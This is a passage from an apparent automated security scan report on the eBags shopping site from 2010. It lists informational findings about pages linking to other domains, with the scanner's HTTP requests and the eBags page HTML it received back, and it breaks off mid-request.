<a title="baggallini Wallet.Bagg - Small - Crinkle Nylon" href="/product/baggallini/walletbagg-small-crinkle-nylon/47349?productid=510056"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/47349_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Wallet.Bagg - Small - Crinkle Nylon" onmouseover="return !ProductHover(47349, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Jewelry Pouch.Bagg - Rip Stop Nylon" href="/product/baggallini/jewelry-pouchbagg-rip-stop-nylon/18643?productid=66035"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/18643_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Jewelry Pouch.Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(18643, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Bagg-in-a- Pouch - Large - Crinkle Nylon" href="/product/baggallini/bagg-in-a-pouch-large-crinkle-nylon/47367?productid=789009"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/47367_12_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Bagg-in-a- Pouch - Large - Crinkle Nylon" onmouseover="return !ProductHover(47367, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini New Yorker - Crinkle Nylon Silver Hardware" href="/product/baggallini/new-yorker-crinkle-nylon-silver-hardware/136619?productid=1354293"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/136619_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini New Yorker - Crinkle Nylon Silver Hardware" onmouseover="return !ProductHover(136619, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="eBags Value Set: Packing Cubes + Portage Jr." href="/product/ebags/value-set-packing-cubes-portage-jr/106800?productid=1281403"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/106800_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Value Set: Packing Cubes + Portage Jr." onmouseover="return !ProductHover(106800, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Triple Zip Bagg" href="/product/baggallini/triple-zip-bagg/127324?productid=1330212"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/127324_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Triple Zip Bagg" onmouseover="return !ProductHover(127324, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Zip-Out Shopping Tote.Bagg - Medium - Rip Stop Nylon" href="/product/baggallini/zip-out-shopping-totebagg-medium-rip-stop-nylon/18647?productid=66074"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/18647_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Zip-Out Shopping Tote.Bagg - Medium - Rip Stop Nylon" onmouseover="return !ProductHover(18647, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Brussels Bagg - Crinkle Nylon Silver Hardware" href="/product/baggallini/brussels-bagg-crinkle-nylon-silver-hardware/136614?productid=1354238"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/136614_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Brussels Bagg - Crinkle Nylon Silver Hardware" onmouseover="return !ProductHover(136614, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="Eagle Creek Pack-It&reg; Compression Set - S&iexcl;M&iexcl;L" href="/product/eagle-creek/pack-it-compression-set-sml/89786?productid=1176684"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/89786_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="Eagle Creek Pack-It&reg; Compression Set - S&iexcl;M&iexcl;L" onmouseover="return !ProductHover(89786, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Milano Tote - Silver Hardware" href="/product/baggallini/milano-tote-silver-hardware/127321?productid=1344187"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/127321_8_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Milano Tote - Silver Hardware" onmouseover="return !ProductHover(127321, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Jewelry Square.Bagg - Rip Stop Nylon" href="/product/baggallini/jewelry-squarebagg-rip-stop-nylon/47422?productid=510727"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/47422_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Jewelry Square.Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(47422, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Messenger Sling.Bagg - Rip Stop Nylon" href="/product/baggallini/messenger-slingbagg-rip-stop-nylon/18644?productid=66039"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/18644_11_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Messenger Sling.Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(18644, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Messenger Sling.Bagg - Crinkle Nylon" href="/product/baggallini/messenger-slingbagg-crinkle-nylon/47360?productid=1330179"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/47360_15_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Messenger Sling.Bagg - Crinkle Nylon" onmouseover="return !ProductHover(47360, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Expandable Tote - Animal Prints" href="/product/baggallini/expandable-tote-animal-prints/107704?productid=1283629"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/107704_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Expandable Tote - Animal Prints" onmouseover="return !ProductHover(107704, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Hanging Cosmetic Bagg - Crinkle Nylon" href="/product/baggallini/hanging-cosmetic-bagg-crinkle-nylon/67303?productid=791405"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/67303_7_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Hanging Cosmetic Bagg - Crinkle Nylon" onmouseover="return !ProductHover(67303, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Ticket Organizer Bagg - Crinkle Nylon" href="/product/baggallini/ticket-organizer-bagg-crinkle-nylon/47402?productid=510572"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/47402_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Ticket Organizer Bagg - Crinkle Nylon" onmouseover="return !ProductHover(47402, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Travel Kitt - Crinkle Nylon" href="/product/baggallini/travel-kitt-crinkle-nylon/107615?productid=1283448"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/107615_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Travel Kitt - Crinkle Nylon" onmouseover="return !ProductHover(107615, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Jewelry Square Bagg - Crinkle Nylon" href="/product/baggallini/jewelry-square-bagg-crinkle-nylon/47438?productid=1344180"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/47438_12_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Jewelry Square Bagg - Crinkle Nylon" onmouseover="return !ProductHover(47438, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Phone&iexcl;PDA Case - Crinkle Nylon" href="/product/baggallini/phonepda-case-crinkle-nylon/87345?productid=1129536"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/87345_8_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Phone&iexcl;PDA Case - Crinkle Nylon" onmouseover="return !ProductHover(87345, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="eBags Value Set: Pack-It-Flat + Shoe Bag" href="/product/ebags/value-set-pack-it-flat-shoe-bag/106803?productid=1281424"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/106803_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Value Set: Pack-It-Flat + Shoe Bag" onmouseover="return !ProductHover(106803, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Midtown Bagg" href="/product/baggallini/midtown-bagg/125167?productid=1324308"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/125167_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Midtown Bagg" onmouseover="return !ProductHover(125167, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Downtown Bagg - Animal Prints" href="/product/baggallini/downtown-bagg-animal-prints/107697?productid=1283609"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107697_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Downtown Bagg - Animal Prints" onmouseover="return !ProductHover(107697, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Ticket Organizer Bagg - Rip Stop" href="/product/baggallini/ticket-organizer-bagg-rip-stop/47391?productid=510440"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/47391_8_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Ticket Organizer Bagg - Rip Stop" onmouseover="return !ProductHover(47391, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Curling Iron Cover.Bagg - Rip Stop Nylon" href="/product/baggallini/curling-iron-coverbagg-rip-stop-nylon/47409?productid=510613"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/47409_4_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Curling Iron Cover.Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(47409, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="A. Saks Deluxe Toiletry Kit" href="/product/a-saks/deluxe-toiletry-kit/122015?productid=1316097"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/122015_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="A. Saks Deluxe Toiletry Kit" onmouseover="return !ProductHover(122015, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="Case Logic iPod touch&amp;sup3; (1st &amp; 2nd Gen) Satin Stripe Case" href="/product/case-logic/ipod-touch-1st-and-2nd-gen-satin-stripe-case/119373?productid=1309952"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/119373_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="Case Logic iPod touch&amp;sup3; (1st &amp; 2nd Gen) Satin Stripe Case" onmouseover="return !ProductHover(119373, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Baby Hampton Bagg - Animal Prints" href="/product/baggallini/baby-hampton-bagg-animal-prints/107678?productid=1283553"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/107678_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Baby Hampton Bagg - Animal Prints" onmouseover="return !ProductHover(107678, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini City Bagg - Animal Prints" href="/product/baggallini/city-bagg-animal-prints/107687?productid=1283572"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107687_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini City Bagg - Animal Prints" onmouseover="return !ProductHover(107687, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

4.5. http://www.ebags.com/help/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /help/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /help/index.cfm?fuseaction=suggest&HelpCenter_Link=Suggestions HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:18 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D7C4E0%5C710F0A6ABDF; expires=Sun, 02-Jan-2011 14:04:18 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45350


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<td align="right" rowspan="10" width="20"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="20" height="1"></td>
<td align="right" width="160"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="160" height="1"></td>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.6. http://www.ebags.com/help/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /help/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /help/index.cfm?fuseaction=ReturnPolicy HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:02 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:04:02 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="https://www.ebags.com/help/index.cfm?fuseaction=returnItem&HelpCenter_Link=IWantToReturnItem"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_return_an_item.gif" alt="Return An Item" border="0"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.7. http://www.ebags.com/info/Compare/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /info/Compare/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /info/Compare/index.cfm?fuseaction=chart&similarchart=120830 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
